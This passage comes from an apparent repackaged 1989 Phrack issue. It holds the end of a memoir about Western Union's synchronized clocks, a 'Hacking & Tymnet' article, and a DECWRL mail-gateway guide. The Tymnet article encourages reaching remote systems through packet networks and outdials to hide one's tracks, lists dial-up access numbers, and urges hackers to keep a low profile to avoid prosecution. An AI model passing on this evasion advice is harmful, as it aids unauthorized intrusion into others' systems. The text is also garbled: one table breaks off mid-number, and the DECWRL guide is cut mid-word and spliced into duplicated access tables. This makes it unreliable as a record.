downtown Chicago had to start on *Thursday* before the Sunday official
changeover just to finish them all by *Tuesday* following.  He would literally
rush in an office, use his screwdriver to open the case, twirl the hour hand
around one hour forward in the spring, (or eleven hours *forward* in the fall
since the hands could not be moved backward beyond the twelve going
counterclockwise), slam the case back on, screw it in, and move down the hall
to the next clock and repeat the process.  He could finish several dozen clocks
per day, and usually the office assigned him a helper twice a year for these
events.
 
He said they never bothered to line the minute hand up just right, because it
would have taken too long, and ".....anyway, as long as we got it within a
minute or so, it would synch itself the next time the master clock sent a
signal..."  Working fast, it took a minute to a minute and a half to open the
case, twirl the minute hand, put the case back on, "stop and b.s. with the
receptionist for a couple seconds" and move along.
 
The master clock sent its signal over regular telco phone lines.  Usually it
would terminate in the main office of whatever place it was, and the (sub)
master there would take over at that point.
 
Wally said it was very important to do a professional job of hanging the clock
to begin with.  It had to be level, and the pendulum had to be just right,
otherwise the clock would gain or lose more time than could be accommodated in
the hourly synching process.  He said it was a very rare clock that actually
was out by even a minute once an hour, let alone the two minutes of tolerance
built into the gear works.
 
     "...Sometimes I would come to work on Monday morning, and find out
     in the office that the clock line had gone open Friday evening.  So
     nobody all weekend got a signal.  Usually I would go down a manhole
     and find it open someplace where one of the Bell guys messed it up,
     or took it off and never put it back on.  To find out where it was
     open, someone in the office would 'ring out' the line; I'd go around
     downtown following the loop as we had it laid out, and keep listening
     on my headset for it.  When I found the break or the open, I would
     tie it down again and the office would release the line; but then I
     had to go to all the clocks *before* that point and restart them,
     since the constant current from the office during the search had
     usually caused them to stop."
 
But he said, time and again, the clocks were usually so well mounted and hung
that "...it was rare we would find one so far out of synch that we had to
adjust it manually.  Usually the first signal to make it through once I
repaired the circuit would yank everyone in town to make up for whatever they
lost or gained over the weekend..."
 
In 1965, Western Union decided to discontinue the Time Service.  In a nostalgic
letter to subscribers, they announced their decision to suspend operations at
the end of the current month, but said "for old time's sake" anyone who had a
clock was welcome to keep it and continue using it; there just would not be any
setting signals from the master clocks any longer.
 
Within a day or two of the official announcement, every Western Union clock in
the Chicago area headquarters building was gone.  The executives snatched them
off the wall, and took them home for the day when they would have historical
value.  All the clocks in the telegraph offices disappeared about the same
time, to be replaced with standard office-style electric wall clocks.
_______________________________________________________________________________


                 -= Exodus =-  '94

                                ==Phrack Inc.==
 
                     Volume Three, Issue 30, File #3 of 12
 
               [-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-]
               [-]                                          [-]
               [-]             Hacking & Tymnet             [-]
               [-]                                          [-]
               [-]                    by                    [-]
               [-]                                          [-]
               [-]                Synthecide                [-]
               [-]                                          [-]
               [-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-]
 
 
There are literally hundreds of systems connected to some of these larger
networks, like Tymnet and Telenet.  Navigation around these networks is very
simple, and usually well explained in their on-line documentation.
Furthermore, some systems will actually tell you what is connected and how to
get to it.  In the case of Tymnet, after dialing in, at the log in prompt, type
"information" for the on-line documentation.
 
Accessing systems through networks is as simple as providing an address for it
to connect to.  The best way to learn about the addresses and how to do things
on a network is to read "A Novice's Guide to Hacking (1989 Edition)" which was
in Issue 22, File 4 of 12, Volume Two (December 23, 1988).  Some points are
re-iterated here.
 
Once on a network, you provide the NUA (network user address) of the system you
wish to connect to.  NUAs are strings of 15 digits, broken up in to 3 fields,
the NETWORK ADDRESS, the AREA PREFIX, and the DNIC.  Each field has 5 digits,
and are left padded with 0's where necessary.
 
The DNIC determines which network to take the address from.  Tymnet, for
example, is 03106. 03110 is Telenet.
 
The AREA PREFIX and NETWORK ADDRESS determine the connection point.  By
providing the address of the system that you wish to connect to, you will be
accessing it through the net... as if you were calling it directly.  Obviously,
then, this provides one more level of security for access.
 
By connecting to an outdial, you can increase again the level of security you
enjoy, by using the outdial in that area to connect to the remote system.
 
Addendum -- Accessing Tymnet Over Local Packet Networks
 
This is just another way to get that extra step and/or bypass other routes.
This table is copied from Tymnet's on-line information.  As said earlier, it's
a great resource, this on-line information!
 
                                 BELL ATLANTIC
 
  NODE    CITY                  STATE           SPEED    ACCESS NUMBER  NTWK
  ----   -------------------    --------------  ------   ------------   ----
  03526   DOVER                 DELAWARE        300/2400 302/734-9465   @PDN
  03526   GEORGETOWN            DELAWARE        300/2400 302/856-7055   @PDN
  03526   NEWARK                DELAWARE        300/2400 302/366-0800   @PDN
  03526   WILMINGTON            DELAWARE        300/1200 302/428-0030   @PDN
  03526   WILMINGTON            DELAWARE        2400     302/655-1144   @PDN
 
 
  06254   WASHINGTON            DIST. OF COL.   300/1200 202/479-7214   @PDN
  06254   WASHINGTON (MIDTOWN)  DIST. OF COL.   2400     202/785-1688   @PDN
  06254   WASHINGTON (DOWNTOWN) DIST. OF COL.   300/1200 202/393-6003   @PDN
  06254   WASHINGTON (MIDTOWN)  DIST. OF COL.   300/1200 202/293-4641   @PDN
  06254   WASHINGTON            DIST. OF COL.   300/1200 202/546-5549   @PDN
  06254   WASHINGTON            DIST. OF COL.   300/1200 202/328-0619   @PDN
 
  06254   BETHESDA              MARYLAND        300/1200  301/986-9942  @PDN
  06254   COLESVILLE            MARYLAND        300/2400  301/989-9324  @PDN
  06254   HYATTSVILLE           MARYLAND        300/1200  301/779-9935  @PDN
  06254   LAUREL                MARYLAND        300/2400  301/490-9971  @PDN
  06254   ROCKVILLE             MARYLAND        300/1200  301/340-9903  @PDN
  06254   SILVER SPRING         MARYLAND        300/1200  301/495-9911  @PDN
 
 
  07771   BERNARDSVILLE         NEW JERSEY      300/2400 201/766-7138   @PDN
  07771   CLINTON               NEW JERSEY      300-1200 201/730-8693   @PDN
  07771   DOVER                 NEW JERSEY      300/2400 201/361-9211   @PDN
  07771   EATONTOWN/RED BANK    NEW JERSEY      300/2400 201/758-8000   @PDN
  07771   ELIZABETH             NEW JERSEY      300/2400 201/289-5100   @PDN
  07771   ENGLEWOOD             NEW JERSEY      300/2400 201/871-3000   @PDN
  07771   FREEHOLD              NEW JERSEY      300/2400 201/780-8890   @PDN
  07771   HACKENSACK            NEW JERSEY      300/2400 201/343-9200   @PDN
  07771   JERSEY CITY           NEW JERSEY      300/2400 201/659-3800   @PDN
  07771   LIVINGSTON            NEW JERSEY      300/2400 201/533-0561   @PDN
  07771   LONG BRANCH/RED BANK  NEW JERSEY      300/2400 201/758-8000   @PDN
  07771   MADISON               NEW JERSEY      300/2400 201/593-0004   @PDN
  07771   METUCHEN              NEW JERSEY      300/2400 201/906-9500   @PDN
  07771   MIDDLETOWN            NEW JERSEY      300/2400 201/957-9000   @PDN
  07771   MORRISTOWN            NEW JERSEY      300/2400 201/455-0437   @PDN
  07771   NEWARK                NEW JERSEY      300/2400 201/623-0083   @PDN
  07771   NEW BRUNSWICK         NEW JERSEY      300/2400 201/247-2700   @PDN
  07771   NEW FOUNDLAND         NEW JERSEY      300/2400 201/697-9380   @PDN
  07771   PASSAIC               NEW JERSEY      300/2400 201/473-6200   @PDN
  07771   PATERSON              NEW JERSEY      300/2400 201/345-7700   @PDN
  07771   PHILLIPSBURG          NEW JERSEY      300/2400 201/454-9270   @PDN
  07771   POMPTON LAKES         NEW JERSEY      300/2400 201/835-8400   @PDN
  07771   RED BANK              NEW JERSEY      300/2400 201/758-8000   @PDN
  07771   RIDGEWOOD             NEW JERSEY      300/2400 201/445-4800   @PDN
  07771   SOMERVILLE            NEW JERSEY      300/2400 201/218-1200   @PDN
  07771   SOUTH RIVER           NEW JERSEY      300/2400 201/390-9100   @PDN
  07771   SPRING LAKE           NEW JERSEY      300/2400 201/974-0850   @PDN
  07771   TOMS RIVER            NEW JERSEY      300/2400 201/286-3800   @PDN
  07771   WASHINGTON            NEW JERSEY      300/2400 201/689-6894   @PDN
  07771   WAYNE/PATERSON        NEW JERSEY      300/2400 201/345-7700   @PDN
 
 
  03526   ALLENTOWN             PENNSYLVANIA    300/1200 215/435-0266   @PDN
  11301   ALTOONA               PENNSYLVANIA    300/1200 814/946-8639   @PDN
  11301   ALTOONA               PENNSYLVANIA    2400     814/949-0505   @PDN
  03526   AMBLER                PENNSYLVANIA    300/1200 215/283-2170   @PDN
  10672   AMBRIDGE              PENNSYLVANIA    300/1200 412/266-9610   @PDN
  10672   CARNEGIE              PENNSYLVANIA    300/1200 412/276-1882   @PDN
  10672   CHARLEROI             PENNSYLVANIA    300/1200 412/483-9100   @PDN
  03526   CHESTER HEIGHTS       PENNSYLVANIA    300/1200 215/358-0820   @PDN
  03526   COATESVILLE           PENNSYLVANIA    300/1200 215/383-7212   @PDN
  10672   CONNELLSVILLE         PENNSYLVANIA    300/1200 412/628-7560   @PDN
  03526   DOWNINGTON/COATES.    PENNSYLVANIA    300/1200 215/383-7212   @PDN
  03562   DOYLESTOWN            PENNSYLVANIA    300/1200 215/340-0052   @PDN
  03562   GERMANTOWN            PENNSYLVANIA    300/1200 215-843-4075   @PDN
  10672   GLENSHAW              PENNSYLVANIA    300/1200 412/487-6868   @PDN
  10672   GREENSBURG            PENNSYLVANIA    300/1200 412/836-7840   @PDN
  11301   HARRISBURG            PENNSYLVANIA    300/1200 717/236-3274   @PDN
  11301   HARRISBURG            PENNSYLVANIA    2400     717/238-0450   @PDN
  10672   INDIANA               PENNSYLVANIA    300/1200 412/465-7210   @PDN
  03526   KING OF PRUSSIA       PENNSYLVANIA    300/1200 215/270-2970   @PDN
  03526   KIRKLYN               PENNSYLVANIA    300/1200 215/789-5650   @PDN
  03526   LANSDOWNE             PENNSYLVANIA    300/1200 215/626-9001   @PDN
  10672   LATROBE               PENNSYLVANIA    300/1200 412/537-0340   @PDN
  11301   LEMOYNE/HARRISBURG    PENNSYLVANIA    300/1200 717/236-3274   @PDN
  10672   MCKEESPORT            PENNSYLVANIA    300/1200 412/673-6200   @PDN
  10672   NEW CASTLE            PENNSYLVANIA    300/1200 412/658-5982   @PDN
  10672   NEW KENSINGTON        PENNSYLVANIA    300/1200 412/337-0510   @PDN
  03526   NORRISTOWN            PENNSYLVANIA    300/1200 215/270-2970   @PDN
  03526   PAOLI                 PENNSYLVANIA    300/1200 215/648-0010   @PDN
  03562   PHILADELPHIA          PENNSYLVANIA    300/1200 215/923-7792   @PDN
  03562   PHILADELPHIA          PENNSYLVANIA    300/1200 215/557-0659   @PDN
  03562   PHILADELPHIA          PENNSYLVANIA    300/1200 215/545-7886   @PDN
  03562   PHILADELPHIA          PENNSYLVANIA    300/1200 215/677-0321   @PDN
  03562   PHILADELPHIA          PENNSYLVANIA    2400     215/625-0770   @PDN
  10672   PITTSBURGH            PENNSYLVANIA    300/1200 412/281-8950   @PDN
  10672   PITTSBURGH            PENNSYLVANIA    300/1200 412-687-4131   @PDN
  10672   PITTSBURGH            PENNSYLVANIA    2400     412/261-9732   @PDN
  10672   POTTSTOWN             PENNSYLVANIA    300/1200 215/327-8032   @PDN
  03526   QUAKERTOWN            PENNSYLVANIA    300/1200 215/538-7032   @PDN
  03526   READING               PENNSYLVANIA    300/1200 215/375-7570   @PDN
  10672   ROCHESTER             PENNSYLVANIA    300/1200 412/728-9770   @PDN
  03526   SCRANTON              PENNSYLVANIA    300/1200 717/348-1123   @PDN
  03526   SCRANTON              PENNSYLVANIA    2400     717/341-1860   @PDN
  10672   SHARON                PENNSYLVANIA    300/1200 412/342-1681   @PDN
  03526   TULLYTOWN             PENNSYLVANIA    300/1200 215/547-3300   @PDN
  10672   UNIONTOWN             PENNSYLVANIA    300/1200 412/437-5640   @PDN
  03562   VALLEY FORGE          PENNSYLVANIA    300/1200 215/270-2970   @PDN
  10672   WASHINGTON            PENNSYLVANIA    300/1200 412/223-9090   @PDN
  03526   WAYNE                 PENNSYLVANIA    300/1200 215/341-9605   @PDN
  10672   WILKINSBURG           PENNSYLVANIA    300/1200 412/241-1006   @PDN
 
 
  06254   ALEXANDRIA            VIRGINIA        300/1200  703/683-6710  @PDN
  06254   ARLINGTON             VIRGINIA        300/1200  703/524-8961  @PDN
  06254   FAIRFAX               VIRGINIA        300/1200  703/385-1343  @PDN
  06254   MCLEAN                VIRGINIA        300/1200  703/848-2941  @PDN
 
 
    @PDN BELL ATLANTIC - NETWORK NAME IS PUBLIC DATA NETWORK (PDN)
 
 
             (CONNECT MESSAGE)
             . _. _. _< _C _R _> _            (SYNCHRONIZES DATA SPEEDS)
 
             WELCOME TO THE BPA/DST PDN
 
             *. _T _  _< _C _R _> _           (TYMNET ADDRESS)
 
 
             131069             (ADDRESS CONFIRMATION - TYMNET DNIC)
             COM                (CONFIRMATION OF CALL SET-UP)
 
             -GWY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DASHES)
 
 
                                  BELL SOUTH
 
  NODE    CITY                  STATE           DENSITY  ACCESS NUMBER MODEM
  -----   --------------------  --------------  ------   ------------  -----
  10207   ATLANTA               GEORGIA         300/1200 404/261-4633  @PLSK
  10207   ATHENS                GEORGIA         300/1200 404/354-0614  @PLSK
  10207   COLUMBUS              GEORGIA         300/1200 404/324-5771  @PLSK
  10207   ROME                  GEORGIA         300/1200 404/234/7542  @PLSK
 
 
    @PLSK  BELLSOUTH - NETWORK NAME IS PULSELINK
 
 
             (CONNECT MESSAGE)
 
             . _. _. _  _< _C _R _> _           (SYNCHRONIZES DATA SPEEDS)
                                (DOES NOT ECHO TO THE TERMINAL)
             CONNECTED
             PULSELINK
 
             1 _3 _1 _0 _6 _              (TYMNET ADDRESS)
                                (DOES NOT ECHO TO THE TERMINAL)
 
             PULSELINK: CALL CONNECTED TO 1 3106
 
             -GWY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DASHES)
 
 
                                 PACIFIC BELL
 
  NODE    CITY                  STATE           DENSITY  ACCESS NUMBER  NTWK
  -----   -------------------   --------------  ------   ------------   ----
  03306   BERKELEY              CALIFORNIA      300/1200 415-548-2121   @PPS
  06272   EL SEGUNDO            CALIFORNIA      300/1200 213-640-8548   @PPS
  06272   FULLERTON             CALIFORNIA      300/1200 714-441-2777   @PPS
  06272   INGLEWOOD             CALIFORNIA      300/1200 213-216-7667   @PPS
  06272   LOS ANGELES(DOWNTOWN) CALIFORNIA      300/1200 213-687-3727   @PPS
  06272   LOS ANGELES           CALIFORNIA      300/1200 213-480-1677   @PPS
  03306   MOUNTAIN VIEW         CALIFORNIA      300/1200 415-960-3363   @PPS
  03306   OAKLAND               CALIFORNIA      300/1200 415-893-9889   @PPS
  03306   PALO ALTO             CALIFORNIA      300/1200 415-325-4666   @PPS
  06272   PASADENA              CALIFORNIA      300/1200 818-356-0780   @PPS
  03306   SAN FRANCISCO         CALIFORNIA      300/1200 415-543-8275   @PPS
  03306   SAN FRANCISCO         CALIFORNIA      300/1200 415-626-5380   @PPS
  03306   SAN FRANCISCO         CALIFORNIA      300/1200 415-362-2280   @PPS
  03306   SAN JOSE              CALIFORNIA      300/1200 408-920-0888   @PPS
  06272   SANTA ANNA            CALIFORNIA      300/1200 714-972-9844   @PPS
  06272   VAN NUYS              CALIFORNIA      300/1200 818-780-1066   @PPS
 
 
    @PPS   PACIFIC BELL - NETWORK NAME IS PUBLIC PACKET SWITCHING (PPS)
 
             (CONNECT MESSAGE)
 
             . _. _. _< _C _R _             (SYNCHRONIZES DATA SPEEDS)>
                                (DOES NOT ECHO TO THE TERMINAL)
 
             ONLINE 1200
             WELCOME TO PPS:  415-XXX-XXXX
             1 _3 _1 _0 _6 _9 _             (TYMNET ADDRESS)
                                (DOES NOT ECHO UNTIL TYMNET RESPONDS)
 
         -GWY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DASHES)
 
                               SOUTHWESTERN BELL
 
  NODE    CITY                  STATE           DENSITY  ACCESS NUMBERS NWRK
  -----   --------------------  --------------  -------  ------------   -----
  05443   KANSAS CITY           KANSAS          300/1200 316/225-9951   @MRLK
  05443   HAYS                  KANSAS          300/1200 913/625-8100   @MRLK
  05443   HUTCHINSON            KANSAS          300/1200 316/669-1052   @MRLK
  05443   LAWRENCE              KANSAS          300/1200 913/841-5580   @MRLK
  05443   MANHATTAN             KANSAS          300/1200 913/539-9291   @MRLK
  05443   PARSONS               KANSAS          300/1200 316/421-0620   @MRLK
  05443   SALINA                KANSAS          300/1200 913/825-4547   @MRLK
  05443   TOPEKA                KANSAS          300/1200 913/235-1909   @MRLK
  05443   WICHITA               KANSAS          300/1200 316/269-1996   @MRLK
 
 
  04766   BRIDGETON/ST. LOUIS   MISSOURI        300/1200 314/622-0900   @MRLK
  04766   ST. LOUIS             MISSOURI        300/1200 314/622-0900   @MRLK
 
 
  06510   ADA                   OKLAHOMA        300/1200 405/4


On a side note, the recent book The Cuckoo's Egg provides some interesting
information (in the form of a story, however) on a Tymnet hacker.  Remember
that he was into BIG things, and hence he was cracked down upon.  If you keep a
low profile, networks should provide a good access method.
 
If you can find a system that is connected to the Internet that you can get on
from Tymnet, you are doing well.
_______________________________________________________________________________


-- Exodus --  '94
                                ==Phrack Inc.==
 
                     Volume Three, Issue 30, File #5 of 12
 
                    ()()()()()()()()()()()()()()()()()()()
                    ()                                  ()
                    ()      The DECWRL Mail Gateway     ()
                    ()                                  ()
                    ()         by Dedicated Link        ()
                    ()                                  ()
                    ()        September 20, 1989        ()
                    ()                                  ()
                    ()()()()()()()()()()()()()()()()()()()
 
 
INTRODUCTION
 
DECWRL is a mail gateway computer operated by Digital's Western Research
Laboratory in Palo Alto, California.  Its purpose is to support the interchange
of electronic mail between Digital and the "outside world."
 
DECWRL is connected to Digital's Easynet, and also to a number of different
outside electronic mail networks.  Digital users can send outside mail by
sending to DECWRL::"outside-address", and digital users can also receive mail
by having your correspondents route it through DECWRL.  The details of incoming
mail are more complex, and are discussed below.
 
It is vitally important that Digital employees be good citizens of the networks
to which we are connected.  They depend on the integrity of our user community
to ensure that tighter controls over the use of the gateway are not required.
The most important rule is "no chain letters," but there are other rules
depending on whether the connected network that you are using is commercial or
non-commercial.
 
The current traffic volume (September 1989) is about 10,000 mail messages per
day and about 3,000 USENET messages per day.  Gatewayed mail traffic has
doubled every year since 1983.  DECWRL is currently a Vax 8530 computer with 48
megabytes of main memory, 2500 megabytes of disk space, 8 9600-baud (Telebit)
modem ports, and various network connections.  They will shortly be upgrading
to a Vax 8650 system.  They run Ultrix 3.0 as the base operating system.
 
 
ADMINISTRATION
 
The gateway has engineering staff, but no administrative or clerical staff.
They work hard to keep it running, but they do not have the resources to answer
telephone queries or provide tutorials in its use.
 
They post periodic status reports to the USENET newsgroup dec.general.  Various
helpful people usually copy these reports to the VAXNOTES "gateways" conference
within a day or two.
 
 
HOW TO SEND MAIL
 
DECWRL is connected to quite a number of different mail networks.  If you were
logged on directly to it, you could type addresses directly, e.g.
 
    To: strange!foreign!address.
 
But since you are not logged on directly to the gateway, you must send mail so
that when it arrives at the gateway, it will be sent as if that address had
been typed locally.
 
 
* Sending from VMS
 
If you are a VMS user, you should use NMAIL, because VMS mail does not know how
to requeue and retry mail when the network is congested or disconnected.  From
VMS, address your mail like this:
 
    To: nm%DECWRL::"strange!foreign!address"
 
The quote characters (") are important, to make sure that VMS doesn't try to
interpret strange!foreign!address itself.  If you are typing such an address
inside a mail program, it will work as advertised.  If you are using DCL and
typing directly to the command line, you should beware that DCL likes to remove
quotes, so you will have to enclose the entire address in quotes, and then put
two quotes in every place that one quote should appear in the address:
 
    $ mail test.msg "nm%DECWRL::""foreign!addr""" /subj="hello"
 
Note the three quotes in a row after foreign!addr.  The first two of them are
doubled to produce a single quote in the address, and the third ends the
address itself (balancing the quote in front of the nm%).
 
Here are some typical outgoing mail addresses as used from a VMS system:
 
    To: nm%DECWRL::"lll-winkin!netsys!phrack"
    To: nm%DECWRL::"postmaster@msp.pnet.sc.edu"
    To: nm%DECWRL::"netsys!phrack@uunet.uu.net"
    To: nm%DECWRL::"phrackserv@CUNYVM.bitnet"
    To: nm%DECWRL::"Chris.Jones@f654.n987.z1.fidonet.org"
 
 
* Sending from Ultrix
 
If your Ultrix system has been configured for it, then you can, from your
Ultrix system, just send directly to the foreign address, and the mail software
will take care of all of the gateway routing for you.  Most Ultrix systems in
Corporate Research and in the Palo Alto cluster are configured this way.
 
To find out whether your Ultrix system has been so configured, just try it and
see what happens.  If it doesn't work, you will receive notification almost
instantly.
 
    NOTE:  The Ultrix mail system is extremely flexible; it is almost
    completely configurable by the customer.  While this is valuable to
    customers, it makes it very difficult to write global instructions for
    the use of Ultrix mailers, because it is possible that the local changes
    have produced something quite unlike the vendor-delivered mailer.  One of
    the popular changes is to tinker with the meaning of quote characters (")
    in Ultrix addresses.  Some systems consider that these two addresses are
    the same:
 
        site1!site2!user@host.dec.com
 
    and
 
        "site1!site2!user"@host.dec.com
 
    while others are configured so that one form will work and the other
    will not.  All of these examples use the quotes.  If you have trouble
    getting the examples to work, please try them again without the quotes.
    Perhaps your Ultrix system is interpreting the quotes differently.
 
If your Ultrix system has an IP link to Palo Alto (type "/etc/ping
decwrl.dec.com" to find out if it does), then you can route your mail to the
gateway via IP.  This has the advantage that your Ultrix mail headers will
reach the gateway directly, instead of being translated into DECNET mail
headers and then back into Ultrix at the other end.  Do this as follows:
 
    To: "alien!address"@decwrl.dec.com
 
The quotes are necessary only if the alien address contains a ! character, but
they don't hurt if you use them unnecessarily.  If the alien address contains
an "@" character, you will need to change it into a "%" character.  For
example, to send via IP to joe@widget.org, you should address the mail
 
    To: "joe%widget.org"@decwrl.dec.com
 
If your Ultrix system has only a DECNET link to Palo Alto, then you should
address mail in much the same way that VMS users do, save that you should not
put the nm% in front of the address:
 
    To: DECWRL::"strange!foreign!address"
 
Here are some typical outgoing mail addresses as used from an Ultrix system
that has IP access.  Ultrix systems without IP access should use the same
syntax as VMS users, except that the nm% at the front of the address should not
be used.
 
    To: "lll-winken!netsys!phrack"@decwrl.dec.com
    To: "postmaster%msp.pnet.sc.edu"@decwrl.dec.com
    To: "phrackserv%CUNYVM.bitnet"@decwrl.dec.com
    To: "netsys!phrack%uunet.uu.net"@decwrl.dec.com
    To: "Chris.Jones@f654.n987.z1.fidonet.org"@decwrl.dec.com
 
 
DETAILS OF USING OTHER NETWORKS
 
All of the world's computer networks are connected together, more or less, so
it is hard to draw exact boundaries between them.  Precisely where the Internet
ends and UUCP begins is a matter of interpretation.
 
For purposes of sending mail, though, it is convenient to divide the network
universe into these categories:
 
Easynet         Digital's internal DECNET network.  Characterized by addresses
                of the form NODE::USER.  Easynet can be used for commercial
                purposes.
 
Internet        A collection of networks including the old ARPAnet, the NSFnet,
                the CSnet, and others.  Most international research,
                development, and educational organizations are connected in
                some fashion to the Internet.  Characterized by addresses of
                the form user@site.subdomain.domain.  The Internet itself
                cannot be used for commercial purposes.
 
UUCP            A very primitive network with no management, built with
                auto-dialers phoning one computer from another.  Characterized
                by addresses of the form place1!place2!user.  The UUCP network
                can be used for commercial purposes provided that none of the
                sites through which the message is routed objects to that.
 
USENET          Not a network at all, but a layer of software built on top of
                UUCP and Internet.
 
BITNET          An IBM-based network linking primarily educational sites.
                Digital users can send to BITNET as if it were part of
                Internet, but BITNET users need special instructions for
                reversing the process.  BITNET cannot be used for commercial
                purposes.
 
Fidonet         A network of personal computers.  I am unsure of the status of
                using Fidonet for commercial purposes, nor am I sure of its
                efficacy.
 
 
DOMAINS AND DOMAIN ADDRESSING
 
There is a particular network called "the Internet;" it is somewhat related to
what used to be "the ARPAnet."  The Internet style of addressing is flexible
enough that people use it for addressing other networks as well, with the
result that it is quite difficult to look at an address and tell just what
network it is likely to traverse.  But the phrase "Internet address" does not
mean "mail address of some computer on the Internet" but rather "mail address
in the style used by the Internet."  Terminology is even further confused
because the word "address" means one thing to people who build networks and
something entirely different to people who use them.  In this file an "address"
is something like "mike@decwrl.dec.com" and not "192.1.24.177" (which is what
network engineers would call an "internet address").
 
The Internet naming scheme uses hierarchical domains, which despite their title
are just a bookkeeping trick.  It doesn't really matter whether you say
NODE::USER or USER@NODE, but what happens when you connect two companies'
networks together and they both have a node ANCHOR??  You must, somehow,
specify which ANCHOR you mean.  You could say ANCHOR.DEC::USER or
DEC.ANCHOR::USER or USER@ANCHOR.DEC or USER@DEC.ANCHOR.  The Internet
convention is to say USER@ANCHOR.DEC, with the owner (DEC) after the name
(ANCHOR).
 
But there could be several different organizations named DEC.  You could have
Digital Equipment Corporation or Down East College or Disabled Education
Committee.  The technique that the Internet scheme uses to resolve conflicts
like this is to have hierarchical domains.  A normal domain isn't DEC or
STANFORD, but DEC.COM (commercial) and STANFORD.EDU (educational).  These
domains can be further divided into ZK3.DEC.COM or CS.STANFORD.EDU.  This
doesn't resolve conflicts completely, though:  both Central Michigan University
and Carnegie-Mellon University could claim to be CMU.EDU.  The rule is that the
owner of the EDU domain gets to decide, just as the owner of the CMU.EDU gets
to decide whether the Electrical Engineering department or the Elementary
Education department gets subdomain EE.CMU.EDU.
 
The domain scheme, while not perfect, is completely extensible.  If you have
two addresses that can potentially conflict, you can suffix some domain to the
end of them, thereby making, say, decwrl.UUCP be somehow different from
DECWRL.ENET.
 
DECWRL's entire mail system is organized according to Internet domains, and in
fact we handle all mail internally as if it were Internet mail.  Incoming mail
is converted into Internet mail, and then routed to the appropriate domain; if
that domain requires some conversion, then the mail is converted to the
requirements of the outbound domain as it passes through the gateway.  For
example, they put Easynet mail into the domain ENE           STATE           DENSITY  ACCESS NUMBER  NTWK
  -----   -------------------   --------------  ------   ------------   ----
  03306   BERKELEY              CALIFORNIA      300/1200 415-548-2121   @PPS
  06272   EL SEGUNDO            CALIFORNIA      300/1200 213-640-8548   @PPS
  06272   FULLERTON             CALIFORNIA      300/1200 714-441-2777   @PPS
  06272   INGLEWOOD             CALIFORNIA      300/1200 213-216-7667   @PPS
  06272   LOS ANGELES(DOWNTOWN) CALIFORNIA      300/1200 213-687-3727   @PPS
  06272   LOS ANGELES           CALIFORNIA      300/1200 213-480-1677   @PPS
  03306   MOUNTAIN VIEW         CALIFORNIA      300/1200 415-960-3363   @PPS
  03306   OAKLAND               CALIFORNIA      300/1200 415-893-9889   @PPS
  03306   PALO ALTO             CALIFORNIA      300/1200 415-325-4666   @PPS
  06272   PASADENA              CALIFORNIA      300/1200 818-356-0780   @PPS
  03306   SAN FRANCISCO         CALIFORNIA      300/1200 415-543-8275   @PPS
  03306   SAN FRANCISCO         CALIFORNIA      300/1200 415-626-5380   @PPS
  03306   SAN FRANCISCO         CALIFORNIA      300/1200 415-362-2280   @PPS
  03306   SAN JOSE              CALIFORNIA      300/1200 408-920-0888   @PPS
  06272   SANTA ANNA            CALIFORNIA      300/1200 714-972-9844   @PPS
  06272   VAN NUYS              CALIFORNIA      300/1200 818-780-1066   @PPS
 
 
    @PPS   PACIFIC BELL - NETWORK NAME IS PUBLIC PACKET SWITCHING (PPS)
 
             (CONNECT MESSAGE)
 
             . _. _. _< _C _R _             (SYNCHRONIZES DATA SPEEDS)>
                                (DOES NOT ECHO TO THE TERMINAL)
 
             ONLINE 1200
             WELCOME TO PPS:  415-XXX-XXXX
             1 _3 _1 _0 _6 _9 _             (TYMNET ADDRESS)
                                (DOES NOT ECHO UNTIL TYMNET RESPONDS)
 
         -GWY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DASHES)
 
                               SOUTHWESTERN BELL
 
  NODE    CITY                  STATE           DENSITY  ACCESS NUMBERS NWRK
  -----   --------------------  --------------  -------  ------------   -----
  05443   KANSAS CITY           KANSAS          300/1200 316/225-9951   @MRLK
  05443   HAYS                  KANSAS          300/1200 913/625-8100   @MRLK
  05443   HUTCHINSON            KANSAS          300/1200 316/669-1052   @MRLK
  05443   LAWRENCE              KANSAS          300/1200 913/841-5580   @MRLK
  05443   MANHATTAN             KANSAS          300/1200 913/539-9291   @MRLK
  05443   PARSONS               KANSAS          300/1200 316/421-0620   @MRLK
  05443   SALINA                KANSAS          300/1200 913/825-4547   @MRLK
  05443   TOPEKA                KANSAS          300/1200 913/235-1909   @MRLK
  05443   WICHITA               KANSAS          300/1200 316/269-1996   @MRLK
 
 
  04766   BRIDGETON/ST. LOUIS   MISSOURI        300/1200 314/622-0900   @MRLK
  04766   ST. LOUIS             MISSOURI        300/1200 314/622-0900   @MRLK
 
 
  06510   ADA                   OKLAHOMA        300/1200 405/436-0252   @MRLK
  06510   ALTUS                 OKLAHOMA        300/1200 405/477-0321   @MRLK
  06510   ALVA                  OKLAHOMA        300/1200 405/327-1441   @MRLK
  06510   ARDMORE               OKLAHOMA        300/1200 405/223-8086   @MRLK
  03167   BARTLESVILLE          OKLAHOMA        300/1200 918/336-6901   @MRLK
  06510   CLINTON               OKLAHOMA        300/1200 405/323-8102   @MRLK
  06510   DURANT                OKLAHOMA        300/1200 405/924-2680   @MRLK
  06510   ENID                  OKLAHOMA        300/1200 405/242-8221   @MRLK
  06510   LAWTON                OKLAHOMA        300/1200 405/248-8772   @MRLK
  03167   MCALESTER             OKLAHOMA        300/1200 918/426-0900   @MRLK
  03167   MIAMI                 OKLAHOMA        300/1200 918/540-1551   @MRLK
  03167   MUSKOGEE              OKLAHOMA        300/1200 918/683-1114   @MRLK
  06510   OKLAHOMA CITY         OKLAHOMA        300/1200 405/236-0660   @MRLK
  06510   PONCA CITY            OKLAHOMA        300/1200 405/762-9926   @MRLK
  03167   SALLISAW              OKLAHOMA        300/1200 918/775-7713   @MRLK
  06510   SHAWNEE               OKLAHOMA        300/1200 405/273-0053   @MRLK
  06510   STILLWATER            OKLAHOMA        300/1200 405/377-5500   @MRLK
  03167   TULSA                 OKLAHOMA        300/1200 918/583-6606   @MRLK
  06510   WOODWARD              OKLAHOMA        300/1200 405/256-9947   @MRLK
 
 
 
 
   @MRLK - SOUTHWESTERN BELL TELEPHONE- NETWORK NAME IS MICROLINK II(R)
 
             (CONNECT MESSAGE)
             (PLEASE TYPE YOUR TERMINAL IDENTIFIER)
 
             A _                  (YOUR TERMINAL IDENTIFIER)
 
